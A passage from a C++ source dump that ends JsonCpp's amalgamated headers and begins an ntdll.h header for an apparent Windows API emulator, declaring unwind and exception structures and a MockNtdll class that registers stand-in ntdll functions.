delete(p); 171 | } 172 | 173 | /** 174 | * Construct an item in-place at pointer P. 175 | */ 176 | template void construct(pointer p, Args&&... args) { 177 | // construct using "placement new" and "perfect forwarding" 178 | ::new (static_cast(p)) T(std::forward(args)...); 179 | } 180 | 181 | size_type max_size() const { return size_t(-1) / sizeof(T); } 182 | 183 | pointer address(reference x) const { return std::addressof(x); } 184 | 185 | const_pointer address(const_reference x) const { return std::addressof(x); } 186 | 187 | /** 188 | * Destroy an item in-place at pointer P. 189 | */ 190 | void destroy(pointer p) { 191 | // destroy using "explicit destructor" 192 | p->~T(); 193 | } 194 | 195 | // Boilerplate 196 | SecureAllocator() {} 197 | template SecureAllocator(const SecureAllocator&) {} 198 | template struct rebind { using other = SecureAllocator; }; 199 | }; 200 | 201 | template 202 | bool operator==(const SecureAllocator&, const SecureAllocator&) { 203 | return true; 204 | } 205 | 206 | template 207 | bool operator!=(const SecureAllocator&, const SecureAllocator&) { 208 | return false; 209 | } 210 | 211 | } // namespace Json 212 | 213 | #pragma pack(pop) 214 | 215 | #endif // JSON_ALLOCATOR_H_INCLUDED 216 | 217 | // ////////////////////////////////////////////////////////////////////// 218 | // End of content of file: include/json/allocator.h 219 | // ////////////////////////////////////////////////////////////////////// 220 | 221 | 222 | 223 | 224 | 225 | 226 | // ////////////////////////////////////////////////////////////////////// 227 | // Beginning of content of file: include/json/config.h 228 | // ////////////////////////////////////////////////////////////////////// 229 | 230 | // Copyright 2007-2010 Baptiste Lepilleur and The JsonCpp Authors 231 | // Distributed under MIT license, or public domain if desired and 232 | // recognized in your jurisdiction. 233 | // See file LICENSE for detail or copy at http://jsoncpp.sourceforge.net/LICENSE 234 | 235 | #ifndef JSON_CONFIG_H_INCLUDED 236 | #define JSON_CONFIG_H_INCLUDED 237 | #include 238 | #include 239 | #include 240 | #include 241 | #include 242 | #include 243 | #include 244 | #include 245 | 246 | // If non-zero, the library uses exceptions to report bad input instead of C 247 | // assertion macros. The default is to use exceptions. 248 | #ifndef JSON_USE_EXCEPTION 249 | #define JSON_USE_EXCEPTION 1 250 | #endif 251 | 252 | // Temporary, tracked for removal with issue #982. 253 | #ifndef JSON_USE_NULLREF 254 | #define JSON_USE_NULLREF 1 255 | #endif 256 | 257 | /// If defined, indicates that the source file is amalgamated 258 | /// to prevent private header inclusion. 259 | /// Remarks: it is automatically defined in the generated amalgamated header. 260 | // #define JSON_IS_AMALGAMATION 261 | 262 | // Export macros for DLL visibility 263 | #if defined(JSON_DLL_BUILD) 264 | #if defined(_MSC_VER) || defined(__MINGW32__) 265 | #define JSON_API __declspec(dllexport) 266 | #define JSONCPP_DISABLE_DLL_INTERFACE_WARNING 267 | #elif defined(__GNUC__) || defined(__clang__) 268 | #define JSON_API __attribute__((visibility("default"))) 269 | #endif // if defined(_MSC_VER) 270 | 271 | #elif defined(JSON_DLL) 272 | #if defined(_MSC_VER) || defined(__MINGW32__) 273 | #define JSON_API __declspec(dllimport) 274 | #define JSONCPP_DISABLE_DLL_INTERFACE_WARNING 275 | #endif // if defined(_MSC_VER) 276 | #endif // ifdef JSON_DLL_BUILD 277 | 278 | #if !defined(JSON_API) 279 | #define JSON_API 280 | #endif 281 | 282 | #if defined(_MSC_VER) && _MSC_VER < 1800 283 | #error \ 284 | "ERROR: Visual Studio 12 (2013) with _MSC_VER=1800 is the oldest supported compiler with sufficient C++11 capabilities" 285 | #endif 286 | 287 | #if defined(_MSC_VER) && _MSC_VER < 1900 288 | // As recommended at 289 | // https://stackoverflow.com/questions/2915672/snprintf-and-visual-studio-2010 290 | extern JSON_API int msvc_pre1900_c99_snprintf(char* outBuf, size_t size, 291 | const char* format, ...); 292 | #define jsoncpp_snprintf msvc_pre1900_c99_snprintf 293 | #else 294 | #define jsoncpp_snprintf std::snprintf 295 | #endif 296 | 297 | // If JSON_NO_INT64 is defined, then Json only support C++ "int" type for 298 | // integer 299 | // Storages, and 64 bits integer support is disabled. 300 | // #define JSON_NO_INT64 1 301 | 302 | // JSONCPP_OVERRIDE is maintained for backwards compatibility of external tools. 303 | // C++11 should be used directly in JSONCPP. 304 | #define JSONCPP_OVERRIDE override 305 | 306 | #ifdef __clang__ 307 | #if __has_extension(attribute_deprecated_with_message) 308 | #define JSONCPP_DEPRECATED(message) __attribute__((deprecated(message))) 309 | #endif 310 | #elif defined(__GNUC__) // not clang (gcc comes later since clang emulates gcc) 311 | #if (__GNUC__ > 4 || (__GNUC__ == 4 && __GNUC_MINOR__ >= 5)) 312 | #define JSONCPP_DEPRECATED(message) __attribute__((deprecated(message))) 313 | #elif (__GNUC__ > 3 || (__GNUC__ == 3 && __GNUC_MINOR__ >= 1)) 314 | #define JSONCPP_DEPRECATED(message) __attribute__((__deprecated__)) 315 | #endif // GNUC version 316 | #elif defined(_MSC_VER) // MSVC (after clang because clang on Windows emulates 317 | // MSVC) 318 | #define JSONCPP_DEPRECATED(message) __declspec(deprecated(message)) 319 | #endif // __clang__ || __GNUC__ || _MSC_VER 320 | 321 | #if !defined(JSONCPP_DEPRECATED) 322 | #define JSONCPP_DEPRECATED(message) 323 | #endif // if !defined(JSONCPP_DEPRECATED) 324 | 325 | #if defined(__clang__) || (defined(__GNUC__) && (__GNUC__ >= 6)) 326 | #define JSON_USE_INT64_DOUBLE_CONVERSION 1 327 | #endif 328 | 329 | #if !defined(JSON_IS_AMALGAMATION) 330 | 331 | #include "allocator.h" 332 | #include "version.h" 333 | 334 | #endif // if !defined(JSON_IS_AMALGAMATION) 335 | 336 | namespace Json { 337 | using Int = int; 338 | using UInt = unsigned int; 339 | #if defined(JSON_NO_INT64) 340 | using LargestInt = int; 341 | using LargestUInt = unsigned int; 342 | #undef JSON_HAS_INT64 343 | #else // if defined(JSON_NO_INT64) 344 | // For Microsoft Visual use specific types as long long is not supported 345 | #if defined(_MSC_VER) // Microsoft Visual Studio 346 | using Int64 = __int64; 347 | using UInt64 = unsigned __int64; 348 | #else // if defined(_MSC_VER) // Other platforms, use long long 349 | using Int64 = int64_t; 350 | using UInt64 = uint64_t; 351 | #endif // if defined(_MSC_VER) 352 | using LargestInt = Int64; 353 | using LargestUInt = UInt64; 354 | #define JSON_HAS_INT64 355 | #endif // if defined(JSON_NO_INT64) 356 | 357 | template 358 | using Allocator = 359 | typename std::conditional, 360 | std::allocator>::type; 361 | using String = std::basic_string, Allocator>; 362 | using IStringStream = 363 | std::basic_istringstream; 365 | using OStringStream = 366 | std::basic_ostringstream; 368 | using IStream = std::istream; 369 | using OStream = std::ostream; 370 | } // namespace Json 371 | 372 | // Legacy names (formerly macros). 373 | using JSONCPP_STRING = Json::String; 374 | using JSONCPP_ISTRINGSTREAM = Json::IStringStream; 375 | using JSONCPP_OSTRINGSTREAM = Json::OStringStream; 376 | using JSONCPP_ISTREAM = Json::IStream; 377 | using JSONCPP_OSTREAM = Json::OStream; 378 | 379 | #endif // JSON_CONFIG_H_INCLUDED 380 | 381 | // ////////////////////////////////////////////////////////////////////// 382 | // End of content of file: include/json/config.h 383 | // ////////////////////////////////////////////////////////////////////// 384 | 385 | 386 | 387 | 388 | 389 | 390 | // ////////////////////////////////////////////////////////////////////// 391 | // Beginning of content of file: include/json/forwards.h 392 | // ////////////////////////////////////////////////////////////////////// 393 | 394 | // Copyright 2007-2010 Baptiste Lepilleur and The JsonCpp Authors 395 | // Distributed under MIT license, or public domain if desired and 396 | // recognized in your jurisdiction. 397 | // See file LICENSE for detail or copy at http://jsoncpp.sourceforge.net/LICENSE 398 | 399 | #ifndef JSON_FORWARDS_H_INCLUDED 400 | #define JSON_FORWARDS_H_INCLUDED 401 | 402 | #if !defined(JSON_IS_AMALGAMATION) 403 | #include "config.h" 404 | #endif // if !defined(JSON_IS_AMALGAMATION) 405 | 406 | namespace Json { 407 | 408 | // writer.h 409 | class StreamWriter; 410 | class StreamWriterBuilder; 411 | class Writer; 412 | class FastWriter; 413 | class StyledWriter; 414 | class StyledStreamWriter; 415 | 416 | // reader.h 417 | class Reader; 418 | class CharReader; 419 | class CharReaderBuilder; 420 | 421 | // json_features.h 422 | class Features; 423 | 424 | // value.h 425 | using ArrayIndex = unsigned int; 426 | class StaticString; 427 | class Path; 428 | class PathArgument; 429 | class Value; 430 | class ValueIteratorBase; 431 | class ValueIterator; 432 | class ValueConstIterator; 433 | 434 | } // namespace Json 435 | 436 | #endif // JSON_FORWARDS_H_INCLUDED 437 | 438 | // ////////////////////////////////////////////////////////////////////// 439 | // End of content of file: include/json/forwards.h 440 | // ////////////////////////////////////////////////////////////////////// 441 | 442 | 443 | 444 | 445 | 446 | #endif //ifndef JSON_FORWARD_AMALGAMATED_H_INCLUDED 447 | -------------------------------------------------------------------------------- /winapi/dlls/ntdll.h: -------------------------------------------------------------------------------- 1 | #if defined(__WINDOWS__) 2 | #pragma once 3 | #endif 4 | 5 | #ifndef _NT_H_ 6 | #define _NT_H_ 7 | #include 8 | #include 9 | #include 10 | #include "../exports.h" 11 | #include "../strutils.hpp" 12 | #if defined(__APPLE__) || defined(__LINUX__) 13 | #include "include/windows.h" 14 | #include 15 | #include 16 | #include 17 | #include 18 | 19 | typedef struct _IMAGE_RUNTIME_FUNCTION_ENTRY { 20 | uint32_t BeginAddress; 21 | uint32_t EndAddress; 22 | uint32_t UnwindData; 23 | } _IMAGE_RUNTIME_FUNCTION_ENTRY, *_PIMAGE_RUNTIME_FUNCTION_ENTRY; 24 | typedef struct _IMAGE_RUNTIME_FUNCTION_ENTRY RUNTIME_FUNCTION, *PRUNTIME_FUNCTION; 25 | #else 26 | #include 27 | 28 | typedef enum _KEY_VALUE_INFORMATION_CLASS { 29 | KeyValueBasicInformation, 30 | KeyValueFullInformation, 31 | KeyValuePartialInformation, 32 | KeyValueFullInformationAlign64, 33 | KeyValuePartialInformationAlign64, 34 | KeyValueLayerInformation, 35 | MaxKeyValueInfoClass 36 | } KEY_VALUE_INFORMATION_CLASS; 37 | 38 | typedef struct _KEY_VALUE_BASIC_INFORMATION { 39 | uint32_t TitleIndex; 40 | uint32_t Type; 41 | uint32_t NameLength; 42 | WCHAR Name[1]; 43 | } KEY_VALUE_BASIC_INFORMATION, *PKEY_VALUE_BASIC_INFORMATION; 44 | 45 | 46 | typedef struct _KEY_VALUE_PARTIAL_INFORMATION { 47 | uint32_t TitleIndex; 48 | uint32_t Type; 49 | uint32_t DataLength; 50 | uint8_t Data[1]; 51 | } KEY_VALUE_PARTIAL_INFORMATION, *PKEY_VALUE_PARTIAL_INFORMATION; 52 | #include 53 | #endif 54 | 55 | #define ALIGN_DOWN_BY(size, align) ((unsigned long long)(size) & ~((unsigned long long)(align) - 1)) 56 | #define ALIGN_UP_BY(size, align) (ALIGN_DOWN_BY(((unsigned long long)(size) + align - 1), align)) 57 | #define ALIGN_UP_POINTER_BY(ptr, align) ((void*)ALIGN_UP_BY(ptr, align)) 58 | 59 | #define UNW_FLAG_NHANDLER 0x0 60 | #define UNW_FLAG_EHANDLER 0x1 61 | #define UNW_FLAG_UHANDLER 0x2 62 | #define UNW_FLAG_CHAININFO 0x4 63 | 64 | #define UNWIND_HISTORY_TABLE_NONE 0 65 | #define UNWIND_HISTORY_TABLE_GLOBAL 1 66 | #define UNWIND_HISTORY_TABLE_LOCAL 2 67 | 68 | #define EXCEPTION_NONCONTINUABLE 0x1 69 | #define EXCEPTION_UNWINDING 0x2 70 | #define EXCEPTION_EXIT_UNWIND 0x4 71 | #define EXCEPTION_STACK_INVALID 0x8 72 | #define EXCEPTION_NESTED_CALL 0x10 73 | #define EXCEPTION_TARGET_UNWIND 0x20 74 | #define EXCEPTION_COLLIDED_UNWIND 0x40 75 | #define EXCEPTION_UNWIND 76 | #define IS_UNWINDING(Flag) ((Flag & EXCEPTION_UNWIND) != 0) 77 | #define IS_DISPATCHING(Flag) ((Flag & EXCEPTION_UNWIND) == 0) 78 | #define IS_TARGET_UNWIND(Flag) (Flag & EXCEPTION_TARGET_UNWIND) 79 | #define EXCEPTION_MAXIMUM_PARAMETERS 15 80 | 81 | #define UWOP_PUSH_NONVOL 0 82 | #define UWOP_ALLOC_LARGE 1 83 | #define UWOP_ALLOC_SMALL 2 84 | #define UWOP_SET_FPREG 3 85 | #define UWOP_SAVE_NONVOL 4 86 | #define UWOP_SAVE_NONVOL_FAR 5 87 | #if 0 // These are deprecated / not for x64 88 | #define UWOP_SAVE_XMM 6 89 | #define UWOP_SAVE_XMM_FAR 7 90 | #else 91 | #define UWOP_EPILOG 6 92 | #define UWOP_SPARE_CODE 7 93 | #endif 94 | #define UWOP_SAVE_XMM128 8 95 | #define UWOP_SAVE_XMM128_FAR 9 96 | #define UWOP_PUSH_MACHFRAME 10 97 | 98 | typedef union _UNWIND_CODE { 99 | struct { 100 | unsigned char CodeOffset; 101 | unsigned char UnwindOp : 4; 102 | unsigned char OpInfo : 4; 103 | }; 104 | USHORT FrameOffset; 105 | } UNWIND_CODE, *PUNWIND_CODE; 106 | 107 | typedef struct _UNWIND_INFO { 108 | unsigned char Version : 3, Flags : 5; // + 0x00 - Unwind info structure version 109 | unsigned char SizeOfProlog; // + 0x01 110 | unsigned char CountOfCodes; // + 0x02 - Count of unwind codes 111 | unsigned char FrameRegister : 4, FrameOffset : 4; // + 0x03 112 | UNWIND_CODE UnwindCode[1]; // + 0x04 - Unwind code array 113 | UNWIND_CODE MoreUnwindCode[1]; 114 | union 115 | { 116 | uint32_t ExceptionHandler; 117 | uint32_t FunctionEntry; 118 | }; 119 | uint32_t ExceptionData[]; 120 | 121 | } UNWIND_INFO, *PUNWIND_INFO; 122 | 123 | 124 | typedef struct _ScopeRecord 125 | { 126 | uint32_t BeginAddress; 127 | uint32_t EndAddress; 128 | uint32_t HandlerAddress; 129 | uint32_t JumpTarget; 130 | } ScopeRecord, *PScopeRecord; 131 | 132 | #if defined(__LINUX__) || defined(__APPLE__) 133 | typedef struct _KNONVOLATILE_CONTEXT_POINTERS { 134 | union { 135 | PM128A FloatingContext[16]; 136 | struct { 137 | PM128A Xmm0; 138 | PM128A Xmm1; 139 | PM128A Xmm2; 140 | PM128A Xmm3; 141 | PM128A Xmm4; 142 | PM128A Xmm5; 143 | PM128A Xmm6; 144 | PM128A Xmm7; 145 | PM128A Xmm8; 146 | PM128A Xmm9; 147 | PM128A Xmm10; 148 | PM128A Xmm11; 149 | PM128A Xmm12; 150 | PM128A Xmm13; 151 | PM128A Xmm14; 152 | PM128A Xmm15; 153 | } DUMMYSTRUCTNAME; 154 | } DUMMYUNIONNAME; 155 | 156 | union { 157 | uint64_t* IntegerContext[16]; 158 | struct { 159 | uint64_t* Rax; 160 | uint64_t* Rcx; 161 | uint64_t* Rdx; 162 | uint64_t* Rbx; 163 | uint64_t* Rsp; 164 | uint64_t* Rbp; 165 | uint64_t* Rsi; 166 | uint64_t* Rdi; 167 | uint64_t* R8; 168 | uint64_t* R9; 169 | uint64_t* R10; 170 | uint64_t* R11; 171 | uint64_t* R12; 172 | uint64_t* R13; 173 | uint64_t* R14; 174 | uint64_t* R15; 175 | } DUMMYSTRUCTNAME; 176 | } DUMMYUNIONNAME2; 177 | } KNONVOLATILE_CONTEXT_POINTERS, *PKNONVOLATILE_CONTEXT_POINTERS; 178 | 179 | struct _EXCEPTION_FRAME; 180 | 181 | #define EXCEPTION_MAXIMUM_PARAMETERS 15 182 | 183 | typedef enum _EXCEPTION_DISPOSITION{ 184 | ExceptionContinueExecution, 185 | ExceptionContinueSearch, 186 | ExceptionNestedException, 187 | ExceptionCollidedUnwind 188 | }EXCEPTION_DISPOSITION, *PEXCEPTION_DISPOSITION; 189 | 190 | typedef struct _EXCEPTION_RECORD { 191 | DWORD ExceptionCode; 192 | DWORD ExceptionFlags; 193 | struct _EXCEPTION_RECORD *ExceptionRecord; 194 | PVOID ExceptionAddress; 195 | DWORD NumberParameters; 196 | ULONG_PTR ExceptionInformation[EXCEPTION_MAXIMUM_PARAMETERS]; 197 | } EXCEPTION_RECORD, *PEXCEPTION_RECORD; 198 | 199 | 200 | typedef EXCEPTION_DISPOSITION __stdcall EXCEPTION_ROUTINE( 201 | struct _EXCEPTION_RECORD *ExceptionRecord, 202 | PVOID EstablisherFrame, struct _CONTEXT *ContextRecord, 203 | PVOID DispatcherContext); 204 | 205 | typedef EXCEPTION_ROUTINE* PEXCEPTION_ROUTINE; 206 | 207 | typedef struct _EXCEPTION_REGISTRATION_RECORD 208 | { 209 | struct _EXCEPTION_REGISTRATION_RECORD *Next; 210 | PEXCEPTION_ROUTINE Handler; 211 | } EXCEPTION_REGISTRATION_RECORD, *PEXCEPTION_REGISTRATION_RECORD; 212 | 213 | typedef EXCEPTION_DISPOSITION(*PEXCEPTION_HANDLER)( 214 | struct _EXCEPTION_RECORD *ExceptionRecord, 215 | struct _EXCEPTION_FRAME *EstablisherFrame, 216 | struct _CONTEXT *ContextRecord, 217 | struct _EXCEPTION_FRAME **DispatcherContext); 218 | 219 | typedef struct _EXCEPTION_FRAME { 220 | struct _EXCEPTION_FRAME *prev; 221 | PEXCEPTION_HANDLER handler; 222 | } EXCEPTION_FRAME, *PEXCEPTION_FRAME; 223 | 224 | #define UNWIND_HISTORY_TABLE_SIZE 12 225 | 226 | typedef struct _UNWIND_HISTORY_TABLE_ENTRY { 227 | uint64_t ImageBase; 228 | PRUNTIME_FUNCTION FunctionEntry; 229 | } UNWIND_HISTORY_TABLE_ENTRY, *PUNWIND_HISTORY_TABLE_ENTRY; 230 | 231 | typedef struct _UNWIND_HISTORY_TABLE { 232 | uint32_t Count; 233 | uint8_t Search; 234 | uint64_t LowAddress; 235 | uint64_t HighAddress; 236 | UNWIND_HISTORY_TABLE_ENTRY Entry[UNWIND_HISTORY_TABLE_SIZE]; 237 | } UNWIND_HISTORY_TABLE, *PUNWIND_HISTORY_TABLE; 238 | 239 | typedef struct _DISPATCHER_CONTEXT 240 | { 241 | uint64_t ControlPc; 242 | uint64_t ImageBase; 243 | struct _IMAGE_RUNTIME_FUNCTION_ENTRY *FunctionEntry; 244 | uint64_t EstablisherFrame; 245 | uint64_t TargetIp; 246 | PCONTEXT ContextRecord; 247 | PEXCEPTION_ROUTINE LanguageHandler; 248 | void* HandlerData; 249 | struct _UNWIND_HISTORY_TABLE *HistoryTable; 250 | uint32_t ScopeIndex; 251 | uint32_t Fill0; 252 | } DISPATCHER_CONTEXT, *PDISPATCHER_CONTEXT; 253 | #endif 254 | class MockNtdll { 255 | public: 256 | function set_ntdll_hookaddr = [](void) { 257 | 258 | APIExports::add_hook_info("ntdll.dll", "RtlGetVersion", (void*)RtlGetVersion); 259 | APIExports::add_hook_info("ntdll.dll", "EventRegister", (void*)EtwRegister); 260 | APIExports::add_hook_info("ntdll.dll", "EventUnregister", (void*)EtwUnregister); 261 | 262 | APIExports::add_hook_info("ntdll.dll", "NtEnumerateValueKey", (void*)NtEnumerateValueKey); 263 | APIExports::add_hook_info("ntdll.dll", "NtQueryValueKey", (void*)NtQueryValueKey); 264 | APIExports::add_hook_info("ntdll.dll", "NtOpenSymbolicLinkObject", (void*)NtOpenSymbolicLinkObject); 265 | APIExports::add_hook_info("ntdll.dll", "NtQuerySymbolicLinkObject", (void*)NtQuerySymbolicLinkObject); 266 | APIExports::add_hook_info("ntdll.dll", "NtQuerySystemInformation", (void*)NtQuerySystemInformation); 267 | 268 | APIExports::add_hook_info("ntdll.dll", "NtQueryDirectoryFile", (void*)NtQueryDirectoryFile); 269 | APIExports::add_hook_info("ntdll.dll", "NtQueryInformationProcess", (void*)NtQueryInformationProcess); 270 | APIExports::add_hook_info("ntdll.dll", "NtQueryInformationThread", (void*)NtQueryInformationThread); 271 | APIExports::add_hook_info("ntdll.dll", "NtQueryInformationFile", (void*)NtQueryInformationFile); 272 | 273 | APIExports::add_hook_info("ntdll.dll", "NtClose", (void*)NtClose); 274 | 275 | APIExports::add_hook_info("ntdll.dll", "RtlCreateHeap", (void*)RtlCreateHeap); 276 | APIExports::add_hook_info("ntdll.dll", "RtlAllocateHeap", (void*)RtlAllocateHeap); 277 | APIExports::add_hook_info("ntdll.dll", "RtlInitUnicodeString", (void*)RtlInitUnicodeString); 278 | APIExports::add_hook_info("ntdll.dll", "RtlInitUnicodeStringEx", (void*)RtlInitUnicodeString); 279 | APIExports::add_hook_info("ntdll.dll", "RtlImageNtHeader", (void*)RtlImageNtHeader); 280 | APIExports::add_hook_info("ntdll.dll", "RtlImageNtHeaderEx", (void*)RtlImageNtHeaderEx); 281 | 282 | 283 | APIExports::add_hook_info("ntdll.dll", "RtlAddFunctionTable", (void*)RtlAddFunctionTable); 284 | APIExports::add_hook_info("ntdll.dll", "RtlDeleteFunctionTable", (void*)RtlDeleteFunctionTable); 285 | APIExports::add_hook_info("ntdll.dll", "RtlLookupFunctionEntry", (void*)RtlLookupFunctionEntry); 286 | 287 | APIExports::add_hook_info("ntdll.dll", "RtlpUpcaseUnicodeChar", (void*)RtlpUpcaseUnicodeChar); 288 | APIExports::add_hook_info("ntdll.dll", "RtlPrefixUnicodeString", (void*)RtlPrefixUnicodeString); 289 | APIExports::add_hook_info("ntdll.dll", "RtlIpv4AddressToStringW", (void*)RtlIpv4AddressToStringW); 290 | APIExports::add_hook_info("ntdll.dll", "RtlPcToFileHeader", (void*)RtlPcToFileHeader); 291 | APIExports::add_hook_info("ntdll.dll", "RtlImageDirectoryEntryToData", (void*)RtlImageDirectoryEntryToData); 292 | APIExports::add_hook_info("ntdll.dll", "RtlCaptureContext", (void*)MockRtlCaptureContext); 293 | APIExports::add_hook_info("ntdll.dll", "RtlRestoreContext", (void*)MockRtlRestoreContext); 294 | APIExports::add_hook_info("ntdll.dll", "RtlUnwind", (void*)MockRtlUnwind); 295 | APIExports::add_hook_info("ntdll.dll", "RtlUnwindEx", (void*)MockRtlUnwindEx); 296 | APIExports::add_hook_info("ntdll.dll", "RtlVirtualUnwind", (void*)RtlVirtualUnwind); 297 | 298 | APIExports::add_hook_info("ntdll.dll", "RtlNtStatusToDosError", (void*)RtlNtStatusToDosError); 299 | 300 | 301 | }; 302 | #if defined(__WINDOWS__) 303 | static NTSTATUS __stdcall MockNtdll::RtlGetVersion(PRTL_OSVERSIONINFOW lpVersionInformation); 304 | static NTSTATUS __stdcall MockNtdll::EtwRegister(void* ProviderId, void* EnableCallback, void* CallbackContext, void* RegHandle); 305 | static NTSTATUS __stdcall MockNtdll::EtwUnregister(void* RegHandle); 306 | 307 | static NTSTATUS __stdcall MockNtdll::NtEnumerateSystemEnvironmentValuesEx(uint32_t InformationClass, void* Buffer, uint32_t* BufferLength); 308 | static NTSTATUS __stdcall MockNtdll::NtEnumerateValueKey(void* KeyHandle, uint32_t Index, KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass, void* KeyValueInformation, uint32_t Length, uint32_t* ResultLength); 309 | static NTSTATUS __stdcall MockNtdll::NtQueryValueKey(void* KeyHandle, void* ValueName, KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass, void* KeyValueInformation, uint32_t Length, uint32_t* ResultLength); 310 | static NTSTATUS __stdcall MockNtdll::NtOpenSymbolicLinkObject(void** LinkHandle, uint32_t DesiredAccess, void* ObjectAttributes); 311 | static NTSTATUS __stdcall MockNtdll::NtQuerySymbolicLinkObject(void* LinkHandle, UNICODE_STRING* LinkTarget, uint32_t* ReturnedLength); 312 | static NTSTATUS __stdcall MockNtdll::NtClose(void* Handle); 313 | static NTSTATUS __stdcall MockNtdll::NtQueryInformationProcess(void* ProcessHandle, uint32_t ProcessInformationClass, void* ProcessInformation, uint32_t ProcessInformationLength, uint32_t* ReturnLength); 314 | static NTSTATUS __stdcall MockNtdll::NtQueryInformationThread(void* ThreadHandle, uint32_t ThreadInformationClass, void* ThreadInformation, uint32_t ThreadInformationLength, uint32_t* ReturnLength); 315 | static NTSTATUS __stdcall MockNtdll::NtQueryInformationFile(void* FileHandle, void* IoStatusBlock, void* FileInformation, uint32_t Length, uint32_t FileInformationClass); 316 | static NTSTATUS __stdcall MockNtdll::NtQuerySystemInformation(uint32_t SystemInformationClass, void* SystemInformation, uint32_t SystemInformationLength, uint32_t* ReturnLength); 317 | static NTSTATUS __stdcall MockNtdll::NtQueryDirectoryFile( 318 | void* FileHandle, 319 | void* Event, 320 | void* ApcRoutine, 321 | void* ApcContext, 322 | void* IoStatusBlock, 323 | void* FileInformation, 324 | uint32_t Length, 325 | uint32_t FileInformationClass, 326 | bool ReturnSingleEntry, 327 | PUNICODE_STRING FileName, 328 | bool RestartScan 329 | ); 330 | static void* __stdcall MockNtdll::RtlCreateHeap(uint32_t Flags, void* HeapBase, size_t ReserveSize, size_t CommitSize, void* Lock, void* Parameters); 331 | static void* __stdcall MockNtdll::RtlAllocateHeap(void* HeapHandle, uint32_t Flags, size_t Size); 332 | static void __stdcall MockNtdll::RtlInitUnicodeString(PUNICODE_STRING DestinationString, char16_t* SourceString); 333 | static void* __stdcall MockNtdll::RtlImageNtHeader(void* ModuleAddress); 334 | static uint32_t __stdcall MockNtdll::RtlImageNtHeaderEx(uint32_t Flags, void* base, uint64_t Size, PIMAGE_NT_HEADERS * OutHeaders); 335 | static bool __stdcall MockNtdll::RtlAddFunctionTable(void* FunctionTable, uint32_t EntryCount, uint64_t BaseAddress); 336 | static bool __stdcall MockNtdll::RtlDeleteFunctionTable(void* FunctionTable); 337 | static PRUNTIME_FUNCTION __stdcall MockNtdll::RtlLookupFunctionEntry(uint64_t ControlPc, uint64_t* ImageBase, void* HistoryTable); 338 | static PRUNTIME_FUNCTION __stdcall MockNtdll::RtlLookupFunctionTable(uint64_t ControlPc, uint64_t* ImageBase, uint32_t* Length); 339 | static WCHAR __stdcall MockNtdll::RtlpUpcaseUnicodeChar(WCHAR Source); 340 | static bool __stdcall MockNtdll::RtlPrefixUnicodeString(PUNICODE_STRING String1, PUNICODE_STRING String2, bool CaseInSensitive); 341 | static char16_t* __stdcall MockNtdll::RtlIpv4AddressToStringW(in_addr *Addr, char16_t* S); 342 | static void* __stdcall MockNtdll::RtlPcToFileHeader(void* PcValue, void** BaseOfImage); 343 | static void* __stdcall MockNtdll::RtlImageDirectoryEntryToData(void* BaseAddress, bool MappedAsImage, uint16_t Directory, uint32_t* Size); 344 | static void __stdcall MockNtdll::MockRtlCaptureContext(void* ContextRecord); 345 | static void __stdcall MockNtdll::MockRtlRestoreContext(void* ContextRecord, PEXCEPTION_RECORD ExceptionRecord); 346 | static void __stdcall MockNtdll::MockRtlUnwind(void* TargetFrame, PVOID TargetIp, PEXCEPTION_RECORD ExceptionRecord, PVOID ReturnValue); 347 | static bool __stdcall MockNtdll::MockRtlUnwindEx(void* TargetFrame, void* TargetIp, void* ExceptionRecord, void* ReturnValue, void* ContextRecord, void* HistoryTable); 348 | static PEXCEPTION_ROUTINE __stdcall MockNtdll::RtlVirtualUnwind( 349 | uint32_t HandlerType, 350 | uint64_t ImageBase, 351 | uint64_t ControlPc, 352 | PRUNTIME_FUNCTION FunctionEntry, 353 | PCONTEXT Context, 354 | void** HandlerData, 355 | uint64_t* EstablisherFrame, 356 | PKNONVOLATILE_CONTEXT_POINTERS ContextPointers 357 | ); 358 | static uint32_t __stdcall MockNtdll::RtlNtStatusToDosError(NTSTATUS Status); 359 | 360 | 361 | #else 362 | static NTSTATUS __stdcall RtlGetVersion(PRTL_OSVERSIONINFOW lpVersionInformation); 363 | static NTSTATUS __stdcall EtwRegister(void* ProviderId, void* EnableCallback, void* CallbackContext, void* RegHandle); 364 | static NTSTATUS __stdcall EtwUnregister(void* RegHandle); 365 | 366 | static NTSTATUS __stdcall NtEnumerateSystemEnvironmentValuesEx(uint32_t InformationClass, void* Buffer, uint32_t* BufferLength); 367 | static NTSTATUS __stdcall NtEnumerateValueKey(void* KeyHandle, uint32_t Index, KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass, void* KeyValueInformation, uint32_t Length, uint32_t* ResultLength); 368 | static NTSTATUS __stdcall NtQueryValueKey(void* KeyHandle, void* ValueName, KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass, void* KeyValueInformation, uint32_t Length, uint32_t* ResultLength); 369 | static NTSTATUS __stdcall NtOpenSymbolicLinkObject(void** LinkHandle, uint32_t DesiredAccess, void* ObjectAttributes); 370 | static NTSTATUS __stdcall NtQuerySymbolicLinkObject(void* LinkHandle, UNICODE_STRING* LinkTarget, uint32_t* ReturnedLength); 371 | static NTSTATUS __stdcall NtClose(void* Handle); 372 | static NTSTATUS __stdcall NtQueryInformationProcess(void* ProcessHandle, uint32_t ProcessInformationClass, void* ProcessInformation, uint32_t ProcessInformationLength, uint32_t* ReturnLength); 373 | static NTSTATUS __stdcall NtQueryInformationThread(void* ThreadHandle, uint32_t ThreadInformationClass, void* ThreadInformation, uint32_t ThreadInformationLength, uint32_t* ReturnLength); 374 | static NTSTATUS __stdcall NtQueryInformationFile(void* FileHandle, void* IoStatusBlock, void* FileInformation, uint32_t Length, uint32_t FileInformationClass); 375 | static NTSTATUS __stdcall NtQuerySystemInformation(uint32_t SystemInformationClass, void* SystemInformation, uint32_t SystemInformationLength, uint32_t* ReturnLength); 376 | static NTSTATUS __stdcall NtQueryDirectoryFile( 377 | void* FileHandle, 378 | void* Event, 379 | void* ApcRoutine, 380 | void* ApcContext, 381 | void* IoStatusBlock, 382 | void* FileInformation, 383 | uint32_t Length, 384 | uint32_t FileInformationClass, 385 | bool ReturnSingleEntry, 386 | PUNICODE_STRING FileName, 387 | bool RestartScan 388 | ); 389 | static void* __stdcall RtlCreateHeap(uint32_t Flags, void* HeapBase, size_t ReserveSize, size_t CommitSize, void* Lock, void* Parameters); 390 | static void* __stdcall RtlAllocateHeap(void* HeapHandle, uint32_t Flags, size_t Size); 391 | static void __stdcall RtlInitUnicodeString(PUNICODE_STRING DestinationString, char16_t* SourceString); 392 | static void* __stdcall 